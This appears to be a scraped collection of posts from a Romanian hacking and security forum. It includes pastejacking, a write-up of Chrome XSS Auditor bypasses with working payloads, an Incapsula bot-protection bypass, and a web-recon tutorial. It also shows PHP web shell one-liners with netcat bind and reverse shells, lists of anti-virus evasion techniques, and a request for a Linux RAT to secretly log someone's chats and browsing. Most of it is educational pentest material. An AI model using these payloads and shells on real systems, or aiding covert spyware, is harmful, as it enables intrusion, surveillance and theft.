Leaderboard

If a user attempts to copy the text with keyboard shortcuts, i.e. ctrl+c or command+c, an 800ms timer gets set that will override the user's clipboard with malicious code. echo "not evil" Sursa : https://github.com/dxa4481/Pastejacking

Salur man. Sedere placuta

Salur Alles, in ce tara stai ? Ce vrei sa inveti mai mult, programare sau pentesting aici ?

Salur AllesKlar.

Salur, mon! Sper sa inveti chestii utile

Excellent paper ... let's move to Overflow Routers Read More : WRT120N fprintf Stack Overflow Developing MIPS Exploits to Hack Routers Exploiting Embedded Devices Router Exploitation - BHUSA09-Lindner WRITING MIPS-IRIX SHELLCODE

Salut ! Scopul este sa emulezi la perfectie un browser in php, setezi cookie, user agent etc. Dar sa zicem ca vrei sa iei (nu neaparat sa le furi) niste informatii de pe un site care nu permite accesul botilor pe site. Pentru a preveni acest lucru, siturile respective detecteaza "Computer screen resolution" si "Browser window size" ca sa vada daca esti bot in php sau om in fata unui monitor. Va dau niste situri ca exemplu care detecteaza acest lucru: http://whatsmyuseragent.com/ si https://www.whatismybrowser.com/ Cum ai putea in php sa emulezi si acesti doi parametri ("Computer screen resolution" si "Browser window size" )ca sa nu se prinda siturile respective ca e vorba doar de un script si nu de un om ? (Daca nu se poate in php, atunci macar alt limbaj dar sa poata fi urcate pe un server scripturile, deci nu .exe sau .pl sau nici chiar .py.) Inca ceva, sa presupunem ca siturile respective de pe care vrei sa iei informatiile care te intereseaza, folosesc si detectare de pluginuri la browser (cum foloseste acest site: http://detectmybrowser.com/ ). Cum faci sa simulezi in php (sau chiar alt limbaj, dar php as prefera) ca tu esti browser si ca ai aceste pluginuri ? Multumesc mult !

Domeniu: eatmecookies.com inregistrat la namesilo Pret: 50$ paypal - site-ul este nou nu are trafic (3-4 pe zi) - 10 retete unice (le puteti verifica) Il vand ca nu am destul timp sa ma ocup de el desi imi pare putin rau, domeniul e bun are si cv backlink-uri... Pot oferi si pagina de facebook are 263 like-uri + vector-ul cu logo-ul...

Nu stiu in ro, insa pentru joburi din afara care accepta lucru full remote, ca idee salariile sunt cam asa (din ce pozitii vad disponibile pe un inside list): - Sr Threat Intelligence Analyst 130k/year - Infrastructure Security Engineer 130k-150k/year - Information Security Developer/Programmer Engineer 110-130k - Incident Response Consultant 170-200k - Product Security Program Manager 130-150k - Senior Digital Forensics and Incident Response Analyst 170k - Sr. Security Incident Response L2 (Lead Role) 150k - jobul asta, de exemplu, e la Paypal - Vulnerability Manager - 90-110k Asa ca daca ai experienta si cunostinte serioase, poti lucra din ro pe un salariu de state. Local probabil salariile sunt undeva de 5-6 ori mai mici ca cele de mai sus pentru aceeasi pozitie.

1 . Foloseste-te de un tool care sa iti arate request-urile in timp real la ceea ce se incarca si misca in pagina, eu folosesc Live HTTP Headers pentru firefox, poti vedea request-uri sa le modifici si sa le retrimiti. In momentul cand tu apesi o tasta se va face un request ca sa iti scoata sugestiile din DB sau ceva: http://s33.postimg.org/mmvhdwg19/curl1.png Daca mergem catre link-ul respectiv vedem api-u care controleaza sugestiile in format JSON: http://s33.postimg.org/vu24k0izx/curl2.png Parsand json-ul vedem: http://s33.postimg.org/5yiwdomnj/curl3.png Pe ramura 3 se afla link-urile. http://pastebin.com/DZYVhU72 2. Nu prea am inteles ce vrei sa obtii dar presupun ca vrei sa scoti sugestiile caz in care procedezi la fel ca sus. 3. Te folosesti de Live HTTP Headers sau orice asemanator sa vezi ce request face in momentul cand tu alegi un checkbox / optiune si trimiti formularul , poate sa fie GET sau POST , functia curl care ti-am dat-o ca exemplu primeste al doilea parametru POST, poate iti este de folos.

Since @brutelogic and I have had a lot of fun bypassing filters, creating challenges and finding new XSS methods and payloads in the past we thought we should try our luck on Chrome’s Auditor. You can read about the results of our research here. The bypasses we found can be used in many cases but there might be some situations where you can’t use them, for example when there’s no closing script tag or with some special chars after the actual payload like > or ?. However, there are some uncommon ways you could try. No closing script tag: When there’s no closing script tag our bypasses won’t work. They need at least one ” somewhere after the payload and </script> anywhere on the page after our injection. But there’s still a way to defeat the filter. We just have to use HTML imports. They will also be important for an uncommon bypass I’ll explain later. Their syntax is very simple: <link rel = "import" href = "/path/to/file.html"> In href we can specify any link we want as long as it doesn’t violate SOP. CORS might help here. Any link except one to a local resource is usually blocked by Chrome’s auditor. However if we use our known bypass we used with script src we are able to include a data: url. Our new payload would be <link rel = "import" href = "data:text/html&comma;&lt;script&gt;alert(document.domain)&lt;&sol;script&gt; We have to use html entities, otherwise our payload is flagged. This is possible as we are inside an href attribute now. [test] Working without being flagged This actually works in the sites context and would alert the domain name. No user interaction or closing script tag required. Local html inclusion This also relies on our link tag, but this time we play by the rules of the auditor. As I mentioned earlier we are only allowed to include local resources. The content type isn’t really important as this would also work with X-Content-Type-Options: nosniff. This gives us an interesting bypass opportunity. When we have an upload feature on the website where we want to inject our payload we can use it to upload a file with html code in its source. For example a .gif file with the content GIF89a<script>alert(1)</script> More info about that here, here and here. Even imgur would accept such a file (even though it can’t be displayed). Here’s the proof: imgur accepts this as a valid gif file Now let’s include it. We do this with <link rel = "import" href = "test.gif"> And there we go. It works! [test] Working great (DOM view) Multiple reflections That’s a whole different class of bypasses than the ones we’ve seen before. It’s not working due to an unclosed quote or the fact that the auditor trusts local resources that are passed without parameters. It is possible because the auditor sees a request with some html tags that look harmless on their own, but can be malicious if they occur more than once. This is usually achieved with script tags. A simple example where this would work is this: <a href = "INJECTION">INJECTION</a> You see, our injection is reflected two times i the same line. All we have to do now is this: \">"</script><script>alert(document.domain)-"\ What did we do here? Let me explain: First we break out of the href with \”>. The \ is required as it will escape the ” later in the script context. After that we have another “. This is going to mark the end of our string. Then we have a simple closing script tag. This won’t be recognized as malicious by the auditor as we have no starting script tag before. Now we start our new script with an opening script tag and write our payload after it. We now have to get rid of everything what’s behind our payload, otherwise we’d get a syntax error. We simply do this with a -“\. The ” will mark a new string and the \ will escape the quote that’s left of our payload. This is really hard to describe, so better see for yourself how the payload looks in the end: Some art right here Again this will alert. [click] Unfortunately this isn’t a common case. When we have multiple reflections they are often separated with newlines and other tags like here: This one looks harder, but is in fact easy We can’t use the trick we just used here. Simply because we have a newline that’s separating our payloads. So what would be a post about filter bypasses without template strings? I can’t even imagine it. As we know they allow multi-line strings which is exactly what we need here. Unfortunately the auditor knows about them and won’t allow them when there’s any character between an opening script tag and a template string. So what can we do about it? It’s really easy: ">`;alert(1)</script><script>` That way there’s no character between our template string and the script tag and we can enclose everything that would produce a syntax error. To be honest that same payload would also work on the first example of a double injection. Even a ‘ instead of the template string would. But it was a great challenge to try it with double quotes and backslashes. Here is our payload in action: [click] The ` makes it work in a multiline scenario All this is possible due to the fact that the auditor searches for the same dangerous string in a the request and response body, trusts local resources, doesn’t consider multi-injections and is not really strict to avoid false positives, which is important for a browser with such a market share. I’m sure there are some other bypasses just waiting to be found. You can try everything I showed you earlier when using this link: https://poc.asdizzle.com/auditor-tests/?mode=plain&q=INJECTION There’s different modes you can try: plain inline event image double double2 multi Have fun testing and Bye SOURCE : https://blog.asdizzle.com

Am gasit un programel pentru android care imi recupereaza mesajele sterse. Pt cine mai are nevoie: https://play.google.com/store/apps/details?id=mobi.bihu.recovery.sms

Poti face o cerere scrisa furnizorului de servicii, insa te taxeaza, si nu vei primi decat desfasuratorul de apeluri/mesaje initiate/trimise, ora, destinatia, durata convorbirii, pretul. Continutul mesajelor (textul) sau inregistrarea audio a conversatiei, nu ti-o da nimeni, caci procedura este complicata, trebuie sa existe o cerere motivata din partea unui organ de urmarire penala, apoi in urma cererii, un mandat semnat de un judecator, pe baza mandatului se emite o autorizatie catre sri sau cine o face aceste operatiuni tehnice, etc.Mesajele primite, si sterse, le poti recupera din telefon, insa daca nu stii cum, te vor taxa cei ce vor face acest serviciu. Operatorul tau nu are/nu este disponibila lista cu apelurile/mesajele primite.

Daca ai smartphone,mi se pare ca este un program care iti recupereaza si mesajele sterse. http://www.yoda.ro/smartphones/ce-date-pot-fi-recuperate-din-telefonul-tau-chiar-daca-il-formatezi.html

Sunt obligati dar accesul se face doar pe baza unui ordin judecatoresc.Doar daca ai neamuri/cunostinte in callcenter poti sa aflii mesajele.Dute la o reprezentanta si te intelegi cu cei de acolo.

cine imi da 37$ il dau..macar sa ies pe 0 cu tot

Sunt sanse sa gasesti acelasi material pe scribd sau alte siteuri. Expert vs referate. Baga un copy/paste in google sa veizi unde il gasesti pe gratis.

De incapsula e simplu de trecut din ce am testat adineauri.Nu stiu daca am testat pe un site care trebuie dar cred ca la celasi Incapsula te referi . Prima vizita de pe ip-u nostru ne va da html-u asta @Che De aici faci un request si daca iti blocheaza accesul o sa vezi chestia asta chestia aia in Hex e jos de tot. Asa http://pastebin.com/Wsy85UbC @Che http://pastebin.com/TkJQMwuV Prima parte nu prea ne intereseaza a doua parte b="CEVA_IN_HEX" , decodat este: http://pastebin.com/4M08pVFE De aici porneste un request: xhr.open("GET", "/_Incapsula_Resource?SWHANEDL=8103315559244218759,14874298502430602693,13300863989648351994,197564", false); Ce trebuie sa prindem cu regex este 8103315559244218759,14874298502430602693,13300863989648351994,197564. Iar apoi faci un request catre /_Incapsula_Resource?SWHANEDL=CODUL_ALA , dupa acel request ar trebui sa ne afiseze pagina normala. Automatizat arata cam asa: http://pastebin.com/bzwtEuya Calea cu cookie trebuie sa fie accesibila.

EXPLOITING BUFFER OVERFLOWS ON MIPS ARCHITECTURES A Walkthrough by Lyon Yang @l0Op3r Editing and Support: Bernhard Mueller Table of Contents 1. Introduction............................................................................................................. 3 2. Triggering and Debugging the Exploit....................................................................... 3 3. Cache Incoherency ................................................................................................... 7 4. Overcoming ASLR..................................................................................................... 8 5. Using ROP Gadgets .................................................................................................. 9 6. Writing the exploit – Calculating Offsets ................................................................ 14 7. Writing the exploit – Writing the MIPS Shellcode Encoder ..................................... 17 8. Writing the exploit – fork() Shellcode..................................................................... 22 Download: https://www.exploit-db.com/docs/39658.pdf

Chestia aia e facuta din javascript , practic daca un site ar vrea sa iti restrictioneze accesul la o resursa pe baza existentei acelor 2 parametri ar trebui ca javascript sa faca un http request sa trimita inapoi catre server rezolutia ecranului/browser-lui , interceptezi request-ul care trimite informatiile respective si il trimiti manual cu curl. O alta posibilitate este sa analizezi putin codul javascript al site-ului si sa vezi daca seteaza niste cookie-uri.Cu curl poti face aproape orice daca observi ce vrea serverul , cel putin pana acum nu am intalnit o situatie in care nu am putut folosi curl pentru ca nu detecteaza "un browser real". Poti sa ne arati cu ce site vrei sa lucrezi si nu iti iese cu curl?

Am vazut ca nu vrei py, dar mie mi s-a parut super simplu si usor de folosit, in caz ca te razgandesti. Eu in python am folosit selenium + pyvirtualdisplay (poti emula si rezolutia dorita)

Tin de la inceput sa mentionez ca tutorialul este pentru aplicatii web. De-a lungul timpului am vazut numeroase persoane care, desi aveau cunostinte despre anumite vulnerabilitati web(de ce apar, cum se exploateaza, etc.), nu reuseau sa gaseasca mai nimic in aplicatii web reale. Acest lucru se datoreaza faptului ca au sarit peste o etapa esentiala a unui audit de securitate si anume, Information Gathering. Neavand o metodologie clara si un plan de atac bine stabilit, acestia nu erau in masura sa obtina date suficiente despre aplicatiile pe care le analizau iar ca urmare a acestui lucru nu reuseau sa identifice vulnerabilitatile. In acest tutorial vom discuta despre care sunt informatiile de care avem nevoie despre tinta si cum le putem afla astfel incat sa ne maximizam rezultatele. Asa cum spuneam la inceputul acestui tutorial, Information Gathering este etapa initiala a oricarui audit de securitate IT care poate face diferenta dintre succes si esec. Prin aceastea, pentesterul incearca sa obtina toate informatiile posibile despre tinta folosindu-se de diferite servicii (motoare de cautare, diferite utilitare, etc.). Intrucat nu exista un model standard, fiecare pentester este liber sa isi construiasca propria metodologie astfel incat rezultatele sa fie cat mai bune. In cele ce urmeaza voi prezenta modul in care obisnuiesc eu sa abordez o tinta atunci cand realizez un audit de securitate. 1.Motoarele de cautare Primul lucru pe care trebuie sa il faci este sa cauti informatii prin intermediul motoarelor de cautare folosindu-te de diferiti operatori de cautare. Astfel poti obtine subdomeniile, diferite fisiere, tehnologiile folosite de aplicatia web si chiar unele vulnerabilitati. Exemplu: diferite subdomenii ale yahoo.com Cei mai folositori operatori ai motorului de cautare Google sunt: site: - acest operator permite afisarea rezultatelor doar de pe un anumit domeniu si este extrem de folositor pentru descoperirea subdomeniilor. Exemplu: site:*.yahoo.com filetype: sau ext: limiteaza rezultatele afisand doar paginile care au o anumita extensie si pot fi folosite pentru a descoperi tehnologiile folosite in dezvoltarea aplicatiei web. Exemplu: site:*.yahoo.com ext:php – am limitat rezultatele cautarii la subdomeniile yahoo.com care au fisiere .php intext:<termen> limiteaza rezultatele afisand doar paginile in care se regaseste termenul specificat si poate fi folosit pentru a descoperi diferite vulnerabilitati. Exemplu: site:targetwebsite.com intext:”You have an error in your SQL syntax” site:targetwebsite.com intext:”Microsoft OLE DB Provider for SQL Server” site:targetwebsite.com intext:”Microsoft JET Database Engine” site:targetwebsite.com intext:”Type mismatch” site:targetwebsite.com intext:”Invalid SQL statement or JDBC” site:targetwebsite.com intext:”mysql_fetch_array()” site:targetwebsite.com intext:”mysql_” operatori logici: Google accepta anumiti operatori logici care de cele mai multe ori sunt foarte folositori. De exemplu, putem exclude din rezultate anumite subdomenii folosind operatorul - . Astfel, site:.yahoo.com -site:games.yahoo.com va returna subdomeniile yahoo.com, mai putin rezultatele care au legatura cu games.yahoo.com. Mai multe informatii despre operatorii de cautare pentru Google gasesti aici si aici. Pe langa motoarele de cautare obsnuite ca Google, Bing, Yahoo etc., foloseste si: Censys - Foarte folositor in descoperirea subdomeniilor Exemplu: https://www.censys.io/certificates?q=parsed.subject.organization%3A%22Yahoo%22 Shodan 2. Determinarea tehnologiilor folosite La acest pas va trebuie sa verifici daca: aplicatia web este protejata de vreun Web Application Firewall (WAF) Cel mai simplu mod prin care poti face acest lucru este folosind wafw00f: $ python watw00f2.py http://www.targetwebsite.com aplicatia web foloseste un Content Management System (CMS) open-source (Wordpress, Joomla, Drupal, etc.) Poti verifica acest lucru folosind whatweb, cms-explorer, CMSmap. $ whatweb -a 3 http://targetwebsite.com $ cms-explorer.pl -url http://targetwebsite.com/ -type wordpress Urmatorul pas consta in identificarea sistemului de operare, al tipului de WebServer (Apache, IIS) folosit de tinta si versiunea acestora. Daca versiunile celor doua sunt outdated, cel mai probabil exista cateva vulnerabilitati cunoscute (CVE) in acele produse. Poti descoperi acest lucru cu o simpla cautare pe http://cvedetails.com . Exemplu: Vulnerabilitatile cunoscute pentru Apache 2.3.1 Determinarea sistemului de operare se poate realiza foarte simplu folosind nmap. $ nmap -sV -O www.targetwebsite.com Metodele prin care poti identifica versiunea Webserver-ului sunt: Analizand output-ul cererilor HTTP care folosesc metoda HEAD, OPTIONS sau TRACE Raspunsul HTTP al unei cereri care foloseste una din metodele de mai sus va contine, de cele mai multe ori, si headerul Server. Analizand pagina de eroare 404 Folosind httprecon / httprint . Un alt aspect important il constituie tehnologia server-side folosita de tinta. Cel mai simplu mod in care aceasta poate fi descoperita este urmarind extensiile fisierelor. De exemplu, daca URL-ul tintei este http://targetwebsite.com/index.php , este clar ca aplicatia web a fost scrisa in limbajul PHP. Alte extensii specifice tehnologiilor server-side sunt: .py – Python .rb – Ruby .pl – Perl .php / .php3 / .php4 / .php5 / .phtml / .phps – PHP .asp – Active Server Pages (Microsoft IIS) .aspx – ASP+ (Microsoft .NET) .asmx – ASP.NET WebServer .cfm – ColdFusion .cfml – Cold Fusion Markup Language .do – Java Struts .action – Java Struts .jnpl – Java WebStart File .jsp – Java Server Page .nsf – Lotus Domino server In cazul in care extensiile nu sunt vizibile in URL, poti identifica tehnologia server-side folosita analizand cookie-ul pe care aplicatia web il seteaza. Exemplu: PHPSESSID=12355566788kk666l544 – PHP De asemenea, iti poti da seama daca o aplicatie web este scrisa in PHP si prin intermediul unui Easter Egg. Daca adaugi codul ?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 la finalul unui URL iar in pagina apare o imagine amuzanta inseamna ca aplicatia respectiva a fost dezvoltata folosind PHP. Bineinteles, acest Easter Egg poate fi dezactivat din php.ini. Mai multe informatii gasesti aici. 3. Identificarea fisierelor aplicatiei web La acest pas nu trebuie decat sa accesezi cat mai multe pagini alte aplicatiei web, fara a face nimic altceva. Viziteaza fiecare pagina insa nu uita sa conectezi browserul la Burp Suite pentru a se crea site-map-ul aplicatiei web. Astfel vei avea o evidenta mult mai clara asupra fisierelor pe care urmeaza sa le testezi. Foloseste Burp Spider pe langa navigarea manuala pentru a descoperi cat mai multe fisiere. PS: verifica daca exista fisierul robots.txt Dupa ce consideri ca ai navigat suficient printre fisierele aplicatiei web, trebuie sa descoperi fisierele ascunse. Exista numeroase aplicatii care te pot ajuta: Dirbuster Functia Discover Content a aplicatiei BurpSuite Wfuzz Patator Burp Intruder Liste de cuvinte pentru scripturile de mai sus: fuzzdb gitDigger svnDigger SecLists Urmatorul pas este sa iei la rand fiecare fisier gasit si sa incerci sa intelegi cum functioneaza aplicatia web respectiva. Pentru a-ti fi mai usor sa iti dai seama unde ar putea exista o vulnerabilitate, pune-ti urmatoarele intrebari: 1. In fisierul pe care il testezi, continutul se modifica in mod dinamic in functie de anumite criterii (valoarea unui parametru din URL, cookie, user agent etc.) ? Mai exact, este posibil ca in acel fisier aplicatia web sa foloseasca informatii dintr-o baza de date? Daca da, testeaza in primul rand pentru vulnerabilitatile de tip injection (SQL, XPATH, LDAP, etc.) insa nu neglija celelalte tipuri de vulnerabilitati. S-ar putea sa ai surprize. 2. Poti controla in vreun fel continutul paginii? Ceilalti utilizatori pot vedea datele pe care le introduci tu? Daca da, testeaza in special pentru vulnerabilitati de tip Cross Site Scripting si Content Spoofing. 3. Aplicatia web poate interactiona cu alte fisiere? Daca da, testeaza in special pentru Local File Inclusion. 4. In fisierul respectiv exista functii care necesita nivel sporit de securitate (cum ar fi formular de schimbare al emailului/parolei etc.)? Daca da, testeaza in special pentru Cross Site Request Forgery. Nu uita sa testezi fiecare parametru al fiecarui fisier pe care l-ai descoperit.

Resources for Aspiring Penetration Testers Scott Sutherland March 11, 2013 At some point, all penetration testers get asked, “Where did you learn all this stuff?” In my experience, the question often comes from clients and students interested in pen testing. Usually, they’re asking because they aren’t sure where to start. There are a number of two- and four-year college programs that can provide a nice structured approach, but generally I think penetration testing is like any other skillset; if you find the right resources, a good direction, and study hard, you’ll acquire the skills you’re looking for. However, I will say that it does help to already have a strong IT background. Regardless of the path taken, it’s nice to have some decent resources along the way. In this blog, I’ve put together a list of books and online training resources that cover topics and skills that I’ve found useful as a penetration tester. Hopefully the list is also useful to those of you interested in getting your feet wet. Have fun and Hack Responsibly! Recommended Books Read, read, and read some more. Recommending that people “Read the F***ing Manual” (RTMF) is just as important today as it was 20 years ago. The list below is really directed at specific tasks that most penetration testers have to perform. I’m aware that there are some obvious gaps in the list, but I haven’t found any books that I really love related to privilege escalation, network attacks, AV evasion, or penetration testing as a profession. Regardless, I hope you enjoy the books as much as I have. Web Application Hacker’s Handbook 2nd Edition Every penetration tester should have a copy of this book. It has good coverage on a lot of web application attack methods with an emphasis on Burp Suite, which a very robust local HTTP proxy. SQL Injection Attack and Defense This book is very complimentary to the Web Application Hacker’s Hand Book. It provides a pretty straightforward approach for identifying and exploiting SQL injection flaws on common database platforms. As a side note, I also recommend playing with Burp Suite and SQLMap while learning how to perform SQL injection attacks. Web Application Obfuscation This book is also complimentary to the Web Application Hacker’s Hand Book and SQL Injection Attack and Defense. It provides a decent overview of techniques that can be used to essentially hide your attacks from web application firewalls, intrusion prevention systems, and web application input filters. Database Hacker’s Handbook This is an oldie but a goody. It provides some great coverage on how to attack the common database platforms. This can come in handy if you’re hoping to escalate your privileges on the database level after finding an SQL injection issue. Managed Code Rootkits This book provides manual and automated methods for reverse engineering managed code applications and frameworks. It covers the .NET framework, Java RTE., and Dalvik applications. I thought it was interesting because it has a large focus on actually poisoning the frameworks instead of the application directly. However, it should be noted that this book does not focus on advanced debugging techniques like most reversing books. A Guide to Kernel Exploitation: Attacking the Core Not all penetration testers spend their days developing kernel exploits, but it’s still good to know the basics. This book has a focus on understanding kernel exploits and how they actually expose operating system vulnerabilities. So far, it’s been a good read, but I haven’t finished it yet. Someone also recently recommended The Shellcoder’s Handbook to me. So consider that as well. Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software I liked this one a lot. It provides a good assembly primer which can come in handy in a lot of ways during a penetration test. It also provides decent coverage in areas that you would expect like static and dynamic malware analysis, file structures, test handlers, packers, and debugging. I’ve also heard that the IDA PRO Book is great if you want to become the reversing master of the universe. However, I don’t actually own it at the moment. Gray Hat Python I really like this book as well. It’s a quick read and it does a good job of describing different debugging, injection, and fuzzing techniques. It also provides a lot of sample code that can be used to perform tasks like hooking and DLL/code injection. I’ve found both techniques to be quite handy for avoiding anti-virus solutions and stealing data protected with encryption. Windows® Internals, Part 1 / Part 2: Covering Windows Server® 2008 R2 and Windows 7 I will most likely never finish either of these books in their entirety. However, they do make great references. If you ever need to know anything about how any part of Windows works, these are the go-to books. Network exploration and security auditing cookbook Nmap has become one of the fundamental “tools of the trade” over the past decade or so. In my opinion, it’s as valuable to administrators as it is to attackers. I think that every IT professional should know what Nmap is and how to use it. This book is a great start for someone who has not been exposed to it in the past. It covers everything from basic system discovery to writing your own plugins to scan for vulnerabilities. MetaSploit: A Penetration Tester’s Guide MetaSploit has also become one of the fundamental “tools of the trade” in recent years. There is a lot of community involvement and I think this is a good book for beginners who want to learn more about MetaSploit and some practical use cases. Free Online Training and Vulnerable VMs Obviously, there are ton of great blogs, training sites, and vulnerable VMs/application out there. I will not be coving all of them. However, I’ve tried to include online resources that are valuable for beginners and veterans alike. SecurityTube SecurityTube is like YouTube, but the videos are dedicated to teaching penetration test skills. Our intern actually recommended this site to me before I knew what it was. Since that time, I’ve been checking every time I start learning a new topic just to see if they have already covered it. I feel the quality of the tutorials is great and obviously recommend it. Irongeek It’s not a pretty site, but it provides a lot of good content. It is also known for releasing video presentations from security conferences is record time. MetaSploit Unleashed This web site provides a free online course all about MetaSploit. They do ask for donations to fund Hackers for Charity which raises funds for underprivileged children in East Africa. It’s a great site with a great cause – I recommend checking it out. VulnHub Reading only gets you so far. Most people in IT are hands on learners so, in order to get your hands dirty, I recommend checking out VulnHub. This is a relatively new site that supplies virtual machines that are designed to be vulnerable. For those of you looking for a quick way to set up a testing lab at home, this may be the most cost/time affective solution. Bug bounties If you feel you have the skills that can now pay the bills, there are lots of companies willing to pay real money if you find a big issue in their product. Below is a site dedicated to consolidating a list of the companies currently paying “bug bounties”. Good Google Searches As I mentioned earlier, I haven’t been able to find books that cover everything I’d like them to. Where books fail, Google usually succeeds. I suggest using it to find good archived presentations from security conferences such as Defcon, Blackhat, Derby con etc. Below I’ve also provided some topics that you might find interesting. Windows Penetration and Escalation In my experience, 90% of enterprise environments are Windows-based operating systems that centralized access control around Active Directory Services. Therefore, it’s good to have an understanding of the tools and techniques used to escalate privileges in those environments. Unfortunately, I have yet to find a single book that covers well; below are some basic keywords, vulnerability categories, and tools to get you started. Default passwords Clear text passwords Excessive privileges: Users, services, gui, files, registry, memory Insecure local and remote services Insecure schedule tasks Local and remote exploits Password guessing: medusa, hydra, bruter, and MetaSploit Password and hash dumping: Cain, lsa secrets, credential manager, fgdump, mimikatz, MetaSploit post modules Password hash cracking: john the ripper, hashcat, lophtcrack, masking, Cain Impersonating users: incognito, mimikatz, pass the hash, MetaSploit psexec, shared accounts, smbexec Linux Penetration and Escalation Even though Linux and UNIX systems aren’t in the majority on most networks, they still have a role to play and so, naturally, it’s good to understand their soft spots as well. For the most part, Linux has many of the same basic keywords and vulnerability categories as Windows: Default passwords Clear text passwords Excessive privileges: Users, services, gui, files, memory, setuid, orphan files, world writable files, sudoers configurations Insecure local and remote services Insecure schedule tasks Local and remote exploits Password guessing: medusa, hydra, bruter, and MetaSploit Password and hash dumping Password hash cracking: john the ripper, hashcat, masking Man in the Middle (MITM) Attacks For some of you, MITM attacks may be a new concept so here is brief description. If a workstation is communicating with a server, and you are routing traffic between them, then you are the MITM. It’s a great position to be in for monitoring and manipulating traffic. There are lots of ways to acquire a MITM position using a range of protocol attacks. To get you started, I’ve provided a list of 10 protocols and tools for attacking systems on a LAN. Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycreds NetBIOS Name Service (NBNS): MetaSploit and responder Link-local Multicast Name Resolution (LLMNR): MetaSploit and responder Pre-Execution Environment (PXE): MetaSploit Dynamic Trunking Protocol (DTP): Yersinia Spanning-Tree Protocol (STP): Yersinia, ettercap (lamia plugin) Hot Stand-by Router Protocol (HSRP): Yersinia Dynamic Host Configuration Protocol (DHCP): Interceptor, MetaSploit, manual setup Domain Name Services (DNS): MetaSploit, ettercap, dsniff, zodiac, ADMIdPack VLAN Tunneling Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig Anti-Virus Evasion Anti-virus evasion is often a requirement during penetration testing. I personally break down AV evasion approaches into the four buckets below. I provided a list of keywords for each category to get your searches started. I’m also planning to release a few blogs down the line that will provide more options and actual examples. Bypass Weak AV Configurations Uninstall anti-virus, disable services, terminate processes, disabled via the GUI, create an exception policy for all .exe files, or execute from external media. Source Code Manipulation Remove comments, randomize function and variable names, encode or encrypt content, delay execution of malicious code, use alternative functions, or insert superfluous functions that change execution flow. Binary Manipulation Bind with white listed applications, pack or compress, modify strings, modify resources, modify imports table, modify assembly to do things mentioned in source code manipulation. Common packers: upx, iexpress, and mpress. Process Manipulation Inject malicious code or DLLs into local or remote process. Native languages can do it directly or through a managed code framework like .net. Powershell is a popular example that the MetaSploit team (amongst others) has been using a lot lately. Also, process manipulation is commonly done with python code that is converted to a portable executable. Sursa: Resources for Aspiring Penetration Testers | NetSPI Blog

Info WebHandler tries to simulate a 'Linux bash prompt' to handle and process: - PHP program execution functions _(e.g. `system`, `passthru`, `exec`, etc)_ - Bind shell connections _(e.g. `nc <ip> <port>`)_ - Reserve shell connections _(e.g. `nc -lvvp 1234`)_ Another feature is to spoof the "User-Agent" field in the HTTP header. (--random-angent). It also supports HTTP proxies (--proxy http://<ip>:<port>) WebHandler works for POST and GET requests: <?php system($_GET['cmd']); ?> <?php passthru($_REQUEST['cmd']); ?> <?php echo exec($_POST['cmd']); ?> WebHandler is a replacement for netcat connections. A example bind connection (e.g. nc -lvvp 1234 -e /bin/sh) Normally the user would do: netcat -l -p 1234 nc -lvvp 1234 A example reverse connection (e.g. nc 127.0.0.1 4321 -e /bin/sh) Normally the user would do: netcat -l -p 4321 nc -lvvp 4321 Usage --Example file: echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php --url is a required argument when sending either GET or POST requests (e.g. a bind 'web based PHP' connection): python webhandler.py --url http://www.mywebsite.com/shell.php?cmd= python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080 --listen is a required argument when working waiting connection (e.g. a reverse 'raw' connection): python webhandler.py --listen 1234 Dependencies If your Python's version < 2.7.x, then argparse is required To install it run: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse OR sudo pip --install argparse. readline is optional. This module it used to provide elaborate line editing and history features git is optional. This allows for the project to be kept up-to-date Links Wiki Known Bugs Download Source

Salutare, poate cineva sa recomande RAT pentru Linux(CentOS 6,7, Debian 7,8, Ubuntu 14.04)? Imi trebue logarea totala ce face persoana pe desktop : skype chat, ce URL a vizitat, ce a scris in FB, Viber etc.

Salut. Am un iphone 5 blocat in icloud. Se poate debloca?